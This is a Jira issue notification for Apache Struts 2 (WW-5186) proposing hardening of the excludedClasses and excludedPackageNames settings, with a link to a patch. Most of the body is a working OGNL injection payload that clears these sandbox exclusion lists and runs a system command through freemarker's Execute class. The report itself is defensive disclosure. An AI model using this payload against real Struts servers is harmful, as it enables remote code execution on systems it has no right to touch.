[jira] [Created] (WW-5186) protect excludedClasses and excludedPackageNames

[tanli (Jira)]

tanli created WW-5186:
-------------------------

             Summary: protect excludedClasses and excludedPackageNames
                 Key: WW-5186
                 URL: https://issues.apache.org/jira/browse/WW-5186
             Project: Struts 2
          Issue Type: Improvement
          Components: Core
    Affects Versions: 6.0.0, 2.5.30
            Reporter: tanli


protect excludedClasses and excludedPackageNames

1)use st062 exp below,attacker clean {{{}excluded{}}}{{{}PackageNames{}}}{{ use 
}}{{'excluded'+'PackageNames'}} also worked.

```
 
{{%\{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))
}}}

```

 

2)to protect struts i push a patch with 

[github pull|https://github.com/apache/struts/pull/564]



--
This message was sent by Atlassian Jira
(v8.20.7#820007)